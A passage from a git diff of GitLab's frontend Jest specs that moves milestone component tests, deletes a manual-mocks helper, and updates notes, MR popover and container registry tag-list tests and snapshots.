b/spec/frontend/members/components/table/member_action_buttons_spec.js index 546d09732d6..1379b2d26ce 100644 --- a/spec/frontend/members/components/table/member_action_buttons_spec.js +++ b/spec/frontend/members/components/table/member_action_buttons_spec.js @@ -14,6 +14,7 @@ describe('MemberActionButtons', () => { wrapper = shallowMount(MemberActionButtons, { propsData: { isCurrentUser: false, + isInvitedUser: false, permissions: { canRemove: true, }, diff --git a/spec/frontend/pages/milestones/shared/components/delete_milestone_modal_spec.js b/spec/frontend/milestones/components/delete_milestone_modal_spec.js index 1fbec0d996d..8978de0e0e0 100644 --- a/spec/frontend/pages/milestones/shared/components/delete_milestone_modal_spec.js +++ b/spec/frontend/milestones/components/delete_milestone_modal_spec.js @@ -3,8 +3,8 @@ import { TEST_HOST } from 'helpers/test_constants'; import mountComponent from 'helpers/vue_mount_component_helper'; import axios from '~/lib/utils/axios_utils'; import { redirectTo } from '~/lib/utils/url_utility'; -import deleteMilestoneModal from '~/pages/milestones/shared/components/delete_milestone_modal.vue'; -import eventHub from '~/pages/milestones/shared/event_hub'; +import deleteMilestoneModal from '~/milestones/components/delete_milestone_modal.vue'; +import eventHub from '~/milestones/event_hub'; jest.mock('~/lib/utils/url_utility', () => ({ ...jest.requireActual('~/lib/utils/url_utility'), diff --git a/spec/frontend/milestones/milestone_combobox_spec.js b/spec/frontend/milestones/components/milestone_combobox_spec.js index 4d1a0a0a440..1af39aff30c 100644 --- a/spec/frontend/milestones/milestone_combobox_spec.js +++ b/spec/frontend/milestones/components/milestone_combobox_spec.js @@ -7,7 +7,7 @@ import Vuex from 'vuex'; import { ENTER_KEY } from '~/lib/utils/keys'; import MilestoneCombobox from '~/milestones/components/milestone_combobox.vue'; import createStore from '~/milestones/stores/'; -import { projectMilestones, groupMilestones } from './mock_data'; +import { projectMilestones, groupMilestones } from '../mock_data'; const extraLinks = [ { text: 'Create new', url: 'http://127.0.0.1:3000/h5bp/html5-boilerplate/-/milestones/new' }, diff --git a/spec/frontend/pages/milestones/shared/components/promote_milestone_modal_spec.js b/spec/frontend/milestones/components/promote_milestone_modal_spec.js index 4280a78c202..11eaa92f2b0 100644 --- a/spec/frontend/pages/milestones/shared/components/promote_milestone_modal_spec.js +++ b/spec/frontend/milestones/components/promote_milestone_modal_spec.js @@ -6,7 +6,7 @@ import waitForPromises from 'helpers/wait_for_promises'; import createFlash from '~/flash'; import axios from '~/lib/utils/axios_utils'; import * as urlUtils from '~/lib/utils/url_utility'; -import PromoteMilestoneModal from '~/pages/milestones/shared/components/promote_milestone_modal.vue'; +import PromoteMilestoneModal from '~/milestones/components/promote_milestone_modal.vue'; jest.mock('~/lib/utils/url_utility'); jest.mock('~/flash'); diff --git a/spec/frontend/milestones/milestone_utils_spec.js b/spec/frontend/milestones/utils_spec.js index f863f31e5a9..82e31c98398 100644 --- a/spec/frontend/milestones/milestone_utils_spec.js +++ b/spec/frontend/milestones/utils_spec.js @@ -1,5 +1,5 @@ import { useFakeDate } from 'helpers/fake_date'; -import { sortMilestonesByDueDate } from '~/milestones/milestone_utils'; +import { sortMilestonesByDueDate } from '~/milestones/utils'; describe('sortMilestonesByDueDate', () => { useFakeDate(2021, 6, 22); diff --git a/spec/frontend/mocks/mocks_helper.js b/spec/frontend/mocks/mocks_helper.js deleted file mode 100644 index 295483cd64c..00000000000 --- a/spec/frontend/mocks/mocks_helper.js +++ /dev/null @@ -1,58 +0,0 @@ -/** - * @module - * - * This module implements auto-injected manual mocks that are cleaner than Jest's approach. - * - * See https://docs.gitlab.com/ee/development/testing_guide/frontend_testing.html - */ - -import fs from 'fs'; -import path from 'path'; - -import readdir from 'readdir-enhanced'; - -const MAX_DEPTH = 20; -const prefixMap = [ - // E.g. the mock ce/foo/bar maps to require path ~/foo/bar - { mocksRoot: 'ce', requirePrefix: '~' }, - // { mocksRoot: 'ee', requirePrefix: 'ee' }, // We'll deal with EE-specific mocks later - // { mocksRoot: 'virtual', requirePrefix: '' }, // We'll deal with virtual mocks later -]; - -const mockFileFilter = (stats) => stats.isFile() && stats.path.endsWith('.js'); - -const getMockFiles = (root) => readdir.sync(root, { deep: MAX_DEPTH, filter: mockFileFilter }); - -// Function that performs setting a mock. This has to be overridden by the unit test, because -// jest.setMock can't be overwritten across files. -// Use require() because jest.setMock expects the CommonJS exports object -const defaultSetMock = (srcPath, mockPath) => - jest.mock(srcPath, () => jest.requireActual(mockPath)); - -export const setupManualMocks = function setupManualMocks(setMock = defaultSetMock) { - prefixMap.forEach(({ mocksRoot, requirePrefix }) => { - const mocksRootAbsolute = path.join(__dirname, mocksRoot); - if (!fs.existsSync(mocksRootAbsolute)) { - return; - } - - getMockFiles(path.join(__dirname, mocksRoot)).forEach((mockPath) => { - const mockPathNoExt = mockPath.substring(0, mockPath.length - path.extname(mockPath).length); - const sourcePath = path.join(requirePrefix, mockPathNoExt); - const mockPathRelative = `./${path.join(mocksRoot, mockPathNoExt)}`; - - try { - setMock(sourcePath, mockPathRelative); - } catch (e) { - if (e.message.includes('Could not locate module')) { - // The corresponding mocked module doesn't exist. Raise a better error. - // Eventualy, we may support virtual mocks (mocks whose path doesn't directly correspond - // to a module, like with the `ee_else_ce` prefix). - throw new Error( - `A manual mock was defined for module ${sourcePath}, but the module doesn't exist!`, - ); - } - } - }); - }); -}; diff --git a/spec/frontend/mocks/mocks_helper_spec.js b/spec/frontend/mocks/mocks_helper_spec.js deleted file mode 100644 index 0abe5c6b949..00000000000 --- a/spec/frontend/mocks/mocks_helper_spec.js +++ /dev/null @@ -1,131 +0,0 @@ -/* eslint-disable global-require */ - -import path from 'path'; - -import axios from '~/lib/utils/axios_utils'; - -const absPath = path.join.bind(null, __dirname); - -jest.mock('fs'); -jest.mock('readdir-enhanced'); - -describe('mocks_helper.js', () => { - let setupManualMocks; - const setMock = jest.fn().mockName('setMock'); - let fs; - let readdir; - - beforeAll(() => { - jest.resetModules(); - jest.setMock = jest.fn().mockName('jest.setMock'); - fs = require('fs'); - readdir = require('readdir-enhanced'); - - // We need to provide setupManualMocks with a mock function that pretends to do the setup of - // the mock. This is because we can't mock jest.setMock across files. - setupManualMocks = () => require('./mocks_helper').setupManualMocks(setMock); - }); - - afterEach(() => { - fs.existsSync.mockReset(); - readdir.sync.mockReset(); - setMock.mockReset(); - }); - - it('enumerates through mock file roots', () => { - setupManualMocks(); - expect(fs.existsSync).toHaveBeenCalledTimes(1); - expect(fs.existsSync).toHaveBeenNthCalledWith(1, absPath('ce')); - - expect(readdir.sync).toHaveBeenCalledTimes(0); - }); - - it("doesn't traverse the directory tree infinitely", () => { - fs.existsSync.mockReturnValue(true); - readdir.sync.mockReturnValue([]); - setupManualMocks(); - - const readdirSpy = readdir.sync; - expect(readdirSpy).toHaveBeenCalled(); - readdirSpy.mock.calls.forEach((call) => { - expect(call[1].deep).toBeLessThan(100); - }); - }); - - it('sets up mocks for CE (the ~/ prefix)', () => { - fs.existsSync.mockImplementation((root) => root.endsWith('ce')); - readdir.sync.mockReturnValue(['root.js', 'lib/utils/util.js']); - setupManualMocks(); - - expect(readdir.sync).toHaveBeenCalledTimes(1); - expect(readdir.sync.mock.calls[0][0]).toBe(absPath('ce')); - - expect(setMock).toHaveBeenCalledTimes(2); - expect(setMock).toHaveBeenNthCalledWith(1, '~/root', './ce/root'); - expect(setMock).toHaveBeenNthCalledWith(2, '~/lib/utils/util', './ce/lib/utils/util'); - }); - - it('sets up mocks for all roots', () => { - const files = { - [absPath('ce')]: ['root', 'lib/utils/util'], - [absPath('node')]: ['jquery', '@babel/core'], - }; - - fs.existsSync.mockReturnValue(true); - readdir.sync.mockImplementation((root) => files[root]); - setupManualMocks(); - - expect(readdir.sync).toHaveBeenCalledTimes(1); - expect(readdir.sync.mock.calls[0][0]).toBe(absPath('ce')); - - expect(setMock).toHaveBeenCalledTimes(2); - expect(setMock).toHaveBeenNthCalledWith(1, '~/root', './ce/root'); - expect(setMock).toHaveBeenNthCalledWith(2, '~/lib/utils/util', './ce/lib/utils/util'); - }); - - it('fails when given a virtual mock', () => { - fs.existsSync.mockImplementation((p) => p.endsWith('ce')); - readdir.sync.mockReturnValue(['virtual', 'shouldntBeImported']); - setMock.mockImplementation(() => { - throw new Error('Could not locate module'); - }); - - expect(setupManualMocks).toThrow( - new Error("A manual mock was defined for module ~/virtual, but the module doesn't exist!"), - ); - - expect(readdir.sync).toHaveBeenCalledTimes(1); - expect(readdir.sync.mock.calls[0][0]).toBe(absPath('ce')); - }); - - describe('auto-injection', () => { - it('handles ambiguous paths', () => { - jest.isolateModules(() => { - const axios2 = require('../../../app/assets/javascripts/lib/utils/axios_utils').default; - expect(axios2.isMock).toBe(true); - }); - }); - - it('survives jest.isolateModules()', (done) => { - jest.isolateModules(() => { - const axios2 = require('~/lib/utils/axios_utils').default; - expect(axios2.isMock).toBe(true); - done(); - }); - }); - - it('can be unmocked and remocked', () => { - jest.dontMock('~/lib/utils/axios_utils'); - jest.resetModules(); - const axios2 = require('~/lib/utils/axios_utils').default; - expect(axios2).not.toBe(axios); - expect(axios2.isMock).toBeUndefined(); - - jest.doMock('~/lib/utils/axios_utils'); - jest.resetModules(); - const axios3 = require('~/lib/utils/axios_utils').default; - expect(axios3).not.toBe(axios2); - expect(axios3.isMock).toBe(true); - }); - }); -}); diff --git a/spec/frontend/mr_popover/__snapshots__/mr_popover_spec.js.snap b/spec/frontend/mr_popover/__snapshots__/mr_popover_spec.js.snap index 3229492506a..5d84b4660c9 100644 --- a/spec/frontend/mr_popover/__snapshots__/mr_popover_spec.js.snap +++ b/spec/frontend/mr_popover/__snapshots__/mr_popover_spec.js.snap @@ -26,7 +26,7 @@ exports[`MR Popover loaded state matches the snapshot 1`] = ` </div> <span - class="text-secondary" + class="gl-text-secondary" > Opened <time> @@ -45,11 +45,11 @@ exports[`MR Popover loaded state matches the snapshot 1`] = ` <h5 class="my-2" > - MR Title + Updated Title </h5> <div - class="text-secondary" + class="gl-text-secondary" > foo/bar!1 @@ -77,14 +77,10 @@ exports[`MR Popover shows skeleton-loader while apollo is loading 1`] = ` /> </div> - <h5 - class="my-2" - > - MR Title - </h5> + <!----> <div - class="text-secondary" + class="gl-text-secondary" > foo/bar!1 diff --git a/spec/frontend/mr_popover/mr_popover_spec.js b/spec/frontend/mr_popover/mr_popover_spec.js index 094d1a6472c..0c6e4211b10 100644 --- a/spec/frontend/mr_popover/mr_popover_spec.js +++ b/spec/frontend/mr_popover/mr_popover_spec.js @@ -15,14 +15,18 @@ describe('MR Popover', () => { }, mocks: { $apollo: { - loading: false, + queries: { + mergeRequest: { + loading: false, + }, + }, }, }, }); }); it('shows skeleton-loader while apollo is loading', () => { - wrapper.vm.$apollo.loading = true; + wrapper.vm.$apollo.queries.mergeRequest.loading = true; return wrapper.vm.$nextTick().then(() => { expect(wrapper.element).toMatchSnapshot(); @@ -33,6 +37,7 @@ describe('MR Popover', () => { it('matches the snapshot', () => { wrapper.setData({ mergeRequest: { + title: 'Updated Title', state: 'opened', createdAt: new Date(), headPipeline: { @@ -64,5 +69,11 @@ describe('MR Popover', () => { expect(wrapper.find(CiIcon).exists()).toBe(false); }); }); + + it('falls back to cached MR title when request fails', () => { + return wrapper.vm.$nextTick().then(() => { + expect(wrapper.text()).toContain('MR Title'); + }); + }); }); }); diff --git a/spec/frontend/notes/components/__snapshots__/notes_app_spec.js.snap b/spec/frontend/notes/components/__snapshots__/notes_app_spec.js.snap new file mode 100644 index 00000000000..5f4b3e04a79 --- /dev/null +++ b/spec/frontend/notes/components/__snapshots__/notes_app_spec.js.snap @@ -0,0 +1,17 @@ +// Jest Snapshot v1, https://goo.gl/fbAQLP + +exports[`note_app when sort direction is asc shows skeleton notes after the loaded discussions 1`] = ` +"<ul id=\\"notes-list\\" class=\\"notes main-notes-list timeline\\"> + <noteable-discussion-stub discussion=\\"[object Object]\\" renderdifffile=\\"true\\" helppagepath=\\"\\" isoverviewtab=\\"true\\"></noteable-discussion-stub> + <skeleton-loading-container-stub></skeleton-loading-container-stub> + <discussion-filter-note-stub style=\\"display: none;\\"></discussion-filter-note-stub> +</ul>" +`; + +exports[`note_app when sort direction is desc shows skeleton notes before the loaded discussions 1`] = ` +"<ul id=\\"notes-list\\" class=\\"notes main-notes-list timeline\\"> + <skeleton-loading-container-stub></skeleton-loading-container-stub> + <noteable-discussion-stub discussion=\\"[object Object]\\" renderdifffile=\\"true\\" helppagepath=\\"\\" isoverviewtab=\\"true\\"></noteable-discussion-stub> + <discussion-filter-note-stub style=\\"display: none;\\"></discussion-filter-note-stub> +</ul>" +`; diff --git a/spec/frontend/notes/components/discussion_filter_spec.js b/spec/frontend/notes/components/discussion_filter_spec.js index 6f62b8ba528..17998dfc9d5 100644 --- a/spec/frontend/notes/components/discussion_filter_spec.js +++ b/spec/frontend/notes/components/discussion_filter_spec.js @@ -1,3 +1,4 @@ +import { GlDropdown } from '@gitlab/ui'; import { createLocalVue, mount } from '@vue/test-utils'; import AxiosMockAdapter from 'axios-mock-adapter'; import Vuex from 'vuex'; @@ -88,6 +89,12 @@ describe('DiscussionFilter component', () => { ); }); + it('disables the dropdown when discussions are loading', () => { + store.state.isLoading = true; + + expect(wrapper.findComponent(GlDropdown).props('disabled')).toBe(true); + }); + it('updates to the selected item', () => { const filterItem = findFilter(DISCUSSION_FILTER_TYPES.ALL); diff --git a/spec/frontend/notes/components/discussion_notes_spec.js b/spec/frontend/notes/components/discussion_notes_spec.js index ff840a55535..59ac75f00e6 100644 --- a/spec/frontend/notes/components/discussion_notes_spec.js +++ b/spec/frontend/notes/components/discussion_notes_spec.js @@ -1,7 +1,6 @@ import { getByRole } from '@testing-library/dom'; import { shallowMount, mount } from '@vue/test-utils'; import '~/behaviors/markdown/render_gfm'; -import { discussionIntersectionObserverHandlerFactory } from '~/diffs/utils/discussions'; import DiscussionNotes from '~/notes/components/discussion_notes.vue'; import NoteableNote from '~/notes/components/noteable_note.vue'; import { SYSTEM_NOTE } from '~/notes/constants'; @@ -27,9 +26,6 @@ describe('DiscussionNotes', () => { const createComponent = (props, mountingMethod = shallowMount) => { wrapper = mountingMethod(DiscussionNotes, { store, - provide: { - discussionObserverHandler: discussionIntersectionObserverHandlerFactory(), - }, propsData: { discussion: discussionMock, isExpanded: false, diff --git a/spec/frontend/notes/components/noteable_discussion_spec.js b/spec/frontend/notes/components/noteable_discussion_spec.js index 6aab60edc4e..727ef02dcbb 100644 --- a/spec/frontend/notes/components/noteable_discussion_spec.js +++ b/spec/frontend/notes/components/noteable_discussion_spec.js @@ -3,7 +3,6 @@ import { nextTick } from 'vue'; import discussionWithTwoUnresolvedNotes from 'test_fixtures/merge_requests/resolved_diff_discussion.json'; import { trimText } from 'helpers/text_helper'; import mockDiffFile from 'jest/diffs/mock_data/diff_file'; -import { discussionIntersectionObserverHandlerFactory } from '~/diffs/utils/discussions'; import DiscussionNotes from '~/notes/components/discussion_notes.vue'; import ReplyPlaceholder from '~/notes/components/discussion_reply_placeholder.vue'; import ResolveWithIssueButton from '~/notes/components/discussion_resolve_with_issue_button.vue'; @@ -32,9 +31,6 @@ describe('noteable_discussion component', () => { wrapper = mount(NoteableDiscussion, { store, - provide: { - discussionObserverHandler: discussionIntersectionObserverHandlerFactory(), - }, propsData: { discussion: discussionMock }, }); }); @@ -171,9 +167,6 @@ describe('noteable_discussion component', () => { wrapper = mount(NoteableDiscussion, { store, - provide: { - discussionObserverHandler: discussionIntersectionObserverHandlerFactory(), - }, propsData: { discussion: discussionMock }, }); }); @@ -192,9 +185,6 @@ describe('noteable_discussion component', () => { wrapper = mount(NoteableDiscussion, { store, - provide: { - discussionObserverHandler: discussionIntersectionObserverHandlerFactory(), - }, propsData: { discussion: discussionMock }, }); }); diff --git a/spec/frontend/notes/components/notes_app_spec.js b/spec/frontend/notes/components/notes_app_spec.js index b3dbc26878f..84d94857fe5 100644 --- a/spec/frontend/notes/components/notes_app_spec.js +++ b/spec/frontend/notes/components/notes_app_spec.js @@ -9,7 +9,6 @@ import DraftNote from '~/batch_comments/components/draft_note.vue'; import batchComments from '~/batch_comments/stores/modules/batch_comments'; import axios from '~/lib/utils/axios_utils'; import * as urlUtility from '~/lib/utils/url_utility'; -import { discussionIntersectionObserverHandlerFactory } from '~/diffs/utils/discussions'; import CommentForm from '~/notes/components/comment_form.vue'; import NotesApp from '~/notes/components/notes_app.vue'; import * as constants from '~/notes/constants'; @@ -79,9 +78,6 @@ describe('note_app', () => { </div>`, }, { - provide: { - discussionObserverHandler: discussionIntersectionObserverHandlerFactory(), - }, propsData, store, }, @@ -378,6 +374,9 @@ describe('note_app', () => { beforeEach(() => { store = createStore(); store.state.discussionSortOrder = constants.DESC; + store.state.isLoading = true; + store.state.discussions = [mockData.discussionMock]; + wrapper = shallowMount(NotesApp, { propsData, store, @@ -390,11 +389,18 @@ describe('note_app', () => { it('finds CommentForm before notes list', () => { expect(getComponentOrder()).toStrictEqual([TYPE_COMMENT_FORM, TYPE_NOTES_LIST]); }); + + it('shows skeleton notes before the loaded discussions', () => { + expect(wrapper.find('#notes-list').html()).toMatchSnapshot(); + }); }); describe('when sort direction is asc', () => { beforeEach(() => { store = createStore(); + store.state.isLoading = true; + store.state.discussions = [mockData.discussionMock]; + wrapper = shallowMount(NotesApp, { propsData, store, @@ -407,6 +413,10 @@ describe('note_app', () => { it('finds CommentForm after notes list', () => { expect(getComponentOrder()).toStrictEqual([TYPE_NOTES_LIST, TYPE_COMMENT_FORM]); }); + + it('shows skeleton notes after the loaded discussions', () => { + expect(wrapper.find('#notes-list').html()).toMatchSnapshot(); + }); }); describe('when multiple draft types are present', () => { diff --git a/spec/frontend/notes/stores/actions_spec.js b/spec/frontend/notes/stores/actions_spec.js index bbe074f0105..7424a87bc0f 100644 --- a/spec/frontend/notes/stores/actions_spec.js +++ b/spec/frontend/notes/stores/actions_spec.js @@ -1183,8 +1183,14 @@ describe('Actions Notes Store', () => { dispatch.mockReturnValue(new Promise(() => {})); }); + it('clears existing discussions', () => { + actions.filterDiscussion({ commit, dispatch }, { path, filter, persistFilter: false }); + + expect(commit.mock.calls).toEqual([[mutationTypes.CLEAR_DISCUSSIONS]]); + }); + it('fetches discussions with filter and persistFilter false', () => { - actions.filterDiscussion({ dispatch }, { path, filter, persistFilter: false }); + actions.filterDiscussion({ commit, dispatch }, { path, filter, persistFilter: false }); expect(dispatch.mock.calls).toEqual([ ['setLoadingState', true], @@ -1193,7 +1199,7 @@ describe('Actions Notes Store', () => { }); it('fetches discussions with filter and persistFilter true', () => { - actions.filterDiscussion({ dispatch }, { path, filter, persistFilter: true }); + actions.filterDiscussion({ commit, dispatch }, { path, filter, persistFilter: true }); expect(dispatch.mock.calls).toEqual([ ['setLoadingState', true], diff --git a/spec/frontend/notes/stores/mutation_spec.js b/spec/frontend/notes/stores/mutation_spec.js index c9e24039b64..da1547ab6e7 100644 --- a/spec/frontend/notes/stores/mutation_spec.js +++ b/spec/frontend/notes/stores/mutation_spec.js @@ -159,6 +159,18 @@ describe('Notes Store mutations', () => { }); }); + describe('CLEAR_DISCUSSIONS', () => { + it('should set discussions to an empty array', () => { + const state = { + discussions: [discussionMock], + }; + + mutations.CLEAR_DISCUSSIONS(state); + + expect(state.discussions).toEqual([]); + }); + }); + describe('ADD_OR_UPDATE_DISCUSSIONS', () => { it('should set the initial notes received', () => { const state = { diff --git a/spec/frontend/packages/shared/utils_spec.js b/spec/frontend/packages/shared/utils_spec.js deleted file mode 100644 index a1076b729f8..00000000000 --- a/spec/frontend/packages/shared/utils_spec.js +++ /dev/null @@ -1,69 +0,0 @@ -import { PackageType, TrackingCategories } from '~/packages/shared/constants'; -import { - packageTypeToTrackCategory, - beautifyPath, - getPackageTypeLabel, - getCommitLink, -} from '~/packages/shared/utils'; -import { packageList } from '../mock_data'; - -describe('Packages shared utils', () => { - describe('packageTypeToTrackCategory', () => { - it('prepend UI to package category', () => { - expect(packageTypeToTrackCategory()).toMatchInlineSnapshot(`"UI::undefined"`); - }); - - it.each(Object.keys(PackageType))('returns a correct category string for %s', (packageKey) => { - const packageName = PackageType[packageKey]; - expect(packageTypeToTrackCategory(packageName)).toBe( - `UI::${TrackingCategories[packageName]}`, - ); - }); - }); - - describe('beautifyPath', () => { - it('returns a string with spaces around /', () => { - expect(beautifyPath('foo/bar')).toBe('foo / bar'); - }); - it('does not fail for empty string', () => { - expect(beautifyPath()).toBe(''); - }); - }); - - describe('getPackageTypeLabel', () => { - describe.each` - packageType | expectedResult - ${'conan'} | ${'Conan'} - ${'maven'} | ${'Maven'} - ${'npm'} | ${'npm'} - ${'nuget'} | ${'NuGet'} - ${'pypi'} | ${'PyPI'} - ${'rubygems'} | ${'RubyGems'} - ${'composer'} | ${'Composer'} - ${'debian'} | ${'Debian'} - ${'helm'} | ${'Helm'} - ${'foo'} | ${null} - `(`package type`, ({ packageType, expectedResult }) => { - it(`${packageType} should show as ${expectedResult}`, () => { - expect(getPackageTypeLabel(packageType)).toBe(expectedResult); - }); - }); - }); - - describe('getCommitLink', () => { - it('returns a relative link when isGroup is false', () => { - const link = getCommitLink(packageList[0], false); - - expect(link).toContain('../commit'); - }); - - describe('when isGroup is true', () => { - it('returns an absolute link matching project path', () => { - const mavenPackage = packageList[0]; - const link = getCommitLink(mavenPackage, true); - - expect(link).toContain(`/${mavenPackage.project_path}/commit`); - }); - }); - }); -}); diff --git a/spec/frontend/packages_and_registries/container_registry/explorer/components/details_page/tags_list_spec.js b/spec/frontend/packages_and_registries/container_registry/explorer/components/details_page/tags_list_spec.js index 9a42c82d7e0..56f12e2f0bb 100644 --- a/spec/frontend/packages_and_registries/container_registry/explorer/components/details_page/tags_list_spec.js +++ b/spec/frontend/packages_and_registries/container_registry/explorer/components/details_page/tags_list_spec.js @@ -1,18 +1,16 @@ -import { GlButton, GlKeysetPagination } from '@gitlab/ui'; import { shallowMount, createLocalVue } from '@vue/test-utils'; import { nextTick } from 'vue'; import VueApollo from 'vue-apollo'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; +import { stripTypenames } from 'helpers/graphql_helpers'; import EmptyTagsState from '~/packages_and_registries/container_registry/explorer/components/details_page/empty_state.vue'; import component from '~/packages_and_registries/container_registry/explorer/components/details_page/tags_list.vue'; import TagsListRow from '~/packages_and_registries/container_registry/explorer/components/details_page/tags_list_row.vue'; import TagsLoader from '~/packages_and_registries/container_registry/explorer/components/details_page/tags_loader.vue'; -import { - TAGS_LIST_TITLE, - REMOVE_TAGS_BUTTON_TITLE, -} from '~/packages_and_registries/container_registry/explorer/constants/index'; +import RegistryList from '~/packages_and_registries/shared/components/registry_list.vue'; import getContainerRepositoryTagsQuery from '~/packages_and_registries/container_registry/explorer/graphql/queries/get_container_repository_tags.query.graphql'; +import { GRAPHQL_PAGE_SIZE } from '~/packages_and_registries/container_registry/explorer/constants/index'; import { tagsMock, imageTagsMock, tagsPageInfo } from '../../mock_data'; const localVue = createLocalVue(); @@ -20,25 +18,20 @@ const localVue = createLocalVue(); describe('Tags List', () => { let wrapper; let apolloProvider; + let resolver; const tags = [...tagsMock]; - const readOnlyTags = tags.map((t) => ({ ...t, canDelete: false })); - const findTagsListRow = () => wrapper.findAll(TagsListRow); - const findDeleteButton = () => wrapper.find(GlButton); - const findListTitle = () => wrapper.find('[data-testid="list-title"]'); - const findPagination = () => wrapper.find(GlKeysetPagination); - const findEmptyState = () => wrapper.find(EmptyTagsState); - const findTagsLoader = () => wrapper.find(TagsLoader); + const findTagsListRow = () => wrapper.findAllComponents(TagsListRow); + const findRegistryList = () => wrapper.findComponent(RegistryList); + const findEmptyState = () => wrapper.findComponent(EmptyTagsState); + const findTagsLoader = () => wrapper.findComponent(TagsLoader); const waitForApolloRequestRender = async () => { await waitForPromises(); await nextTick(); }; - const mountComponent = ({ - propsData = { isMobile: false, id: 1 }, - resolver = jest.fn().mockResolvedValue(imageTagsMock()), - } = {}) => { + const mountComponent = ({ propsData = { isMobile: false, id: 1 } } = {}) => { localVue.use(VueApollo); const requestHandlers = [[getContainerRepositoryTagsQuery, resolver]]; @@ -48,6 +41,7 @@ describe('Tags List', () => { localVue, apolloProvider, propsData, + stubs: { RegistryList }, provide() { return { config: {}, @@ -56,99 +50,58 @@ describe('Tags List', () => { }); }; + beforeEach(() => { + resolver = jest.fn().mockResolvedValue(imageTagsMock()); + }); + afterEach(() => { wrapper.destroy(); - wrapper = null; }); - describe('List title', () => { - it('exists', async () => { + describe('registry list', () => { + beforeEach(() => { mountComponent(); - await waitForApolloRequestRender(); - - expect(findListTitle().exists()).toBe(true); + return waitForApolloRequestRender(); }); - it('has the correct text', async () => { - mountComponent(); - - await waitForApolloRequestRender(); - - expect(findListTitle().text()).toBe(TAGS_LIST_TITLE); + it('binds the correct props', () => { + expect(findRegistryList().props()).toMatchObject({ + title: '2 tags', + pagination: stripTypenames(tagsPageInfo), + items: stripTypenames(tags), + idProperty: 'name', + }); }); - }); - describe('delete button', () => { - it.each` - inputTags | isMobile | isVisible - ${tags} | ${false} | ${true} - ${tags} | ${true} | ${false} - ${readOnlyTags} | ${false} | ${false} - ${readOnlyTags} | ${true} | ${false} - `( - 'is $isVisible that delete button exists when tags is $inputTags and isMobile is $isMobile', - async ({ inputTags, isMobile, isVisible }) => { - mountComponent({ - propsData: { tags: inputTags, isMobile, id: 1 }, - resolver: jest.fn().mockResolvedValue(imageTagsMock(inputTags)), + describe('events', () => { + it('prev-page fetch the previous page', () => { + findRegistryList().vm.$emit('prev-page'); + + expect(resolver).toHaveBeenCalledWith({ + first: null, + before: tagsPageInfo.startCursor, + last: GRAPHQL_PAGE_SIZE, + id: '1', }); - - await waitForApolloRequestRender(); - - expect(findDeleteButton().exists()).toBe(isVisible); - }, - ); - - it('has the correct text', async () => { - mountComponent(); - - await waitForApolloRequestRender(); - - expect(findDeleteButton().text()).toBe(REMOVE_TAGS_BUTTON_TITLE); - }); - - it('has the correct props', async () => { - mountComponent(); - await waitForApolloRequestRender(); - - expect(findDeleteButton().attributes()).toMatchObject({ - category: 'secondary', - variant: 'danger', }); - }); - - it.each` - disabled | doSelect | buttonDisabled - ${true} | ${false} | ${'true'} - ${true} | ${true} | ${'true'} - ${false} | ${false} | ${'true'} - ${false} | ${true} | ${undefined} - `( - 'is $buttonDisabled that the button is disabled when the component disabled state is $disabled and is $doSelect that the user selected a tag', - async ({ disabled, buttonDisabled, doSelect }) => { - mountComponent({ propsData: { tags, disabled, isMobile: false, id: 1 } }); - - await waitForApolloRequestRender(); - - if (doSelect) { - findTagsListRow().at(0).vm.$emit('select'); - await nextTick(); - } - expect(findDeleteButton().attributes('disabled')).toBe(buttonDisabled); - }, - ); + it('next-page fetch the previous page', () => { + findRegistryList().vm.$emit('next-page'); - it('click event emits a deleted event with selected items', async () => { - mountComponent(); - - await waitForApolloRequestRender(); + expect(resolver).toHaveBeenCalledWith({ + after: tagsPageInfo.endCursor, + first: GRAPHQL_PAGE_SIZE, + id: '1', + }); + }); - findTagsListRow().at(0).vm.$emit('select'); - findDeleteButton().vm.$emit('click'); + it('emits a delete event when list emits delete', () => { + const eventPayload = 'foo'; + findRegistryList().vm.$emit('delete', eventPayload); - expect(wrapper.emitted('delete')[0][0][0].name).toBe(tags[0].name); + expect(wrapper.emitted('delete')).toEqual([[eventPayload]]); + }); }); }); @@ -199,10 +152,12 @@ describe('Tags List', () => { }); describe('when the list of tags is empty', () => { - const resolver = jest.fn().mockResolvedValue(imageTagsMock([])); + beforeEach(() => { + resolver = jest.fn().mockResolvedValue(imageTagsMock([])); + }); it('has the empty state', async () => { - mountComponent({ resolver }); + mountComponent(); await waitForApolloRequestRender(); @@ -210,7 +165,7 @@ describe('Tags List', () => { }); it('does not show the loader', async () => { - mountComponent({ resolver }); + mountComponent(); await waitForApolloRequestRender(); @@ -218,76 +173,13 @@ describe('Tags List', () => { }); it('does not show the list', async () => { - mountComponent({ resolver }); - - await waitForApolloRequestRender(); - - expect(findTagsListRow().exists()).toBe(false); - expect(findListTitle().exists()).toBe(false); - }); - }); - - describe('pagination', () => { - it('exists', async () => { - mountComponent(); - - await waitForApolloRequestRender(); - - expect(findPagination().exists()).toBe(true); - }); - - it('is hidden when loading', () => { mountComponent(); - expect(findPagination().exists()).toBe(false); - }); - - it('is hidden when there are no more pages', async () => { - mountComponent({ resolver: jest.fn().mockResolvedValue(imageTagsMock([])) }); - await waitForApolloRequestRender(); - expect(findPagination().exists()).toBe(false); - }); - - it('is wired to the correct pagination props', async () => { - mountComponent(); - - await waitForApolloRequestRender(); - - expect(findPagination().props()).toMatchObject({ - hasNextPage: tagsPageInfo.hasNextPage, - hasPreviousPage: tagsPageInfo.hasPreviousPage, - }); - }); - - it('fetch next page when user clicks next', async () => { - const resolver = jest.fn().mockResolvedValue(imageTagsMock()); - mountComponent({ resolver }); - - await waitForApolloRequestRender(); - - findPagination().vm.$emit('next'); - - expect(resolver).toHaveBeenCalledWith( - expect.objectContaining({ after: tagsPageInfo.endCursor }), - ); - }); - - it('fetch previous page when user clicks prev', async () => { - const resolver = jest.fn().mockResolvedValue(imageTagsMock()); - mountComponent({ resolver }); - - await waitForApolloRequestRender(); - - findPagination().vm.$emit('prev'); - - expect(resolver).toHaveBeenCalledWith( - expect.objectContaining({ first: null, before: tagsPageInfo.startCursor }), - ); + expect(findRegistryList().exists()).toBe(false); }); }); - describe('loading state', () => { it.each` isImageLoading | queryExecuting | loadingVisible @@ -306,8 +198,6 @@ describe('Tags List', () => { expect(findTagsLoader().exists()).toBe(loadingVisible); expect(findTagsListRow().exists()).toBe(!loadingVisible); - expect(findListTitle().exists()).toBe(!loadingVisible); - expect(findPagination().exists()).toBe(!loadingVisible); }, ); }); diff --git 